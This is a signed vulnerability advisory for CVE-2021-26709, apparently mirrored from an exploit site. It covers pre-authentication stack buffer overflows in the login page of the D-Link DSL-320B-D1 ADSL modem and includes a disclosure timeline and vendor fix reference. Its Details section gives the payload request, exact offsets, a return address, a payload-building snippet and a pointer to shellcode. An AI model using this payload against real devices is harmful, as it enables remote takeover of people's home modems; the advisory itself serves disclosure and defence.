Share
## https://sploitus.com/exploit?id=PACKETSTORM:162133
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
Multiple Pre-Auth Stack Buffer Overflow in D-Link DSL-320B-D1 ADSL Modem  
  
======== < Table of Contents > =========================================  
  
0. Overview  
1. Details  
2. Solution  
3. Disclosure Timeline  
4. Thanks & Acknowledgements  
5. References  
6. Credits  
7. Legal Notices  
  
======== < 0. Overview > ===============================================  
  
Release Date: 7 March 2021  
  
Revision: 1.0  
  
Impact:  
  
The ADSL modem DSL-320B-D1, version EU_1.25 and lower, is affected to  
multiple Stack Buffer Overflows that allow unauthenticated remote  
attackers to takeover the device.  
  
Severity: Critical  
  
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)  
  
CVE-ID: CVE-2021-26709  
  
Vendor: D-Link  
  
Affected Products: DSL-320B-D1  
  
Affected Versions: EU_1.25 and lower  
  
======== < 1. Details > ================================================  
  
During a Penetration Test it was possible to identify and exploit  
multiple Stack Buffer Overflows (1) in the D-Link DSL-320B-D1 ADSL modem  
,a now legacy model, which is distributed in the past by Telecom Italia  
on loan for use together with the residential ADSL line.  
  
The vulnerabilities are present in the login functionality, exposed by  
"login.xgi" with "user" and "pass" parameters.  
  
[[  
GET /login.xgi?user=" + payload + "&pass=abcde HTTP/1.1\nHost: " +  
host + "\n\n"  
]]  
  
To exploit the vulnerability using "user" parameter, you need  
construct the payload like the following:  
  
[[  
OFFSET = 652  
ADDR = 0x7ffe8ab0  
  
payload = "A"*OFFSET  
payload += pack(">I", ADDR)  
payload += shellcode  
]]  
  
While the "pass" parameter uses 641 as offset.  
  
The payload must be passed as parameter value in a GET request.  
  
You can found a working shellcode here:  
https://www.exploit-db.com/shellcodes/45541  
  
You will have to change the ip/port to match your network configuration.  
  
Using ROP is possible to avoid to use the hardcoded addresses.  
  
======== < 2. Solution > ===============================================  
  
Refer to D-Link Support Announcements "SAP10216" for details (2).  
  
======== < 3. Disclosure Timeline > ====================================  
  
09/01/2021 : Discovery of the vulnerability  
23/01/2021 : Vulnerability submitted to vendor  
25/01/2021 : Vendor request more info about exploit the vulnerabilities  
27/01/2021 : Sent details to vendor  
01/02/2021 : Request status update to the vendor  
13/02/2021 : Sent CVE assigned by mitre to vendor  
13/02/2021 : Vendor response, analysis in progress  
30/03/2021 : Request status update to the vendor  
30/03/2021 : Vendor confirm the vulnerabilities  
07/04/2021 : Public disclosure  
  
======== < 4. Thanks & Acknowledgements > ==============================  
  
D-Link US SIRT  
  
======== < 5. References > =============================================  
  
(1) https://cwe.mitre.org/data/definitions/121.html  
(2) https://supportannouncement.us.dlink.com/announcement/publication.as  
px?name=SAP10216  
(3) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26709  
  
======== < 6. Credits > ================================================  
  
This vulnerability was discovered and reported by:  
  
Gabriele 'matrix' Gristina (gabriele DOT gristina AT gmail DOT com)  
  
Contacts:  
  
https://www.linkedin.com/in/gabrielegristina  
https://twitter.com/gm4tr1x  
https://github.com/matrix/  
  
======== < 7. Legal Notices > ==========================================  
  
Copyright (c) 2021 Gabriele 'matrix' Gristina  
  
Permission is granted for the redistribution of this alert  
electronically. It may not be edited in any way without mine express  
written consent. If you wish to reprint the whole or any  
part of this alert in any other medium other than electronically,  
please email me for permission.  
  
Disclaimer: The information in the advisory is believed to be accurate  
at the time of publishing based on currently available information.  
Use of the information constitutes acceptance for use in an AS IS  
condition.  
There are no warranties with regard to this information. Neither the  
author nor the publisher accepts any liability for any direct,  
indirect, or consequential loss or damage arising from use of,  
or reliance on,this information.  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEElKssfhju0ogMPPCn7SvzgGQpUxsFAmBuug8ACgkQ7SvzgGQp  
UxsERA//SsjAPq95yZItWPBiSrOSxUuRUUAzwzuo4bIYNb5bjfMDgB/HsnwwtG5W  
yPXUoKWHLxyaX3nconGirDOHNSYNTd23sYXx+K3T97l/cPNZ3Nv5vk9DRDK76NNc  
Xe2v7WdBBS1jAbuKKAHv8ioc+uxPs9oi9Iz70Uv9pQsaq2QSm6B+AX5s0fQIsgje  
glPPYMLAasdmr4Wwk6XBOrzw8zvnkMxaRGsIJ2QmIpl7kmiN2BivSSKWfS8rUhEG  
RfhIyTjDyN1yHU+GOTEJe04D8CjpLSUCsfFz7BxPYs1IFK44RZfiMJp4c7o7vMPG  
uXJWpeq6wfraCh/g/JY5rvOpiyYC5e+mtg8MQjJW5ZEkK8Szg14douVn/bLsRFIc  
cEs3mImqE/8pwksKDRLqAUq9/Q1dt5FRwFLJDpX5e18bwR1XOU1+iRMQJuUGBnre  
UEibw1u8bSjJakFi9gCXQC2LrvbAC/tc97I42bA7qhiJxmOaMdPWt/C7Is/bVdYB  
JdVUej2eMBlsmfVaPbM6aT18+Z9sfIMKaGq9nAbBmY+DNI6gBfX0ty8X1o39ADcQ  
I+DEXnKBZP1YhWlvYYR5mBMYs9wJzw8OGyeGqK2LU1tmWfF9d0drXK5pvK1sSpQh  
/ytQ4g/jSRp+UBK7Ulxep08gCphGuAkc7NuKsbHh4YgkCbIaIDI=  
=4j+1  
-----END PGP SIGNATURE-----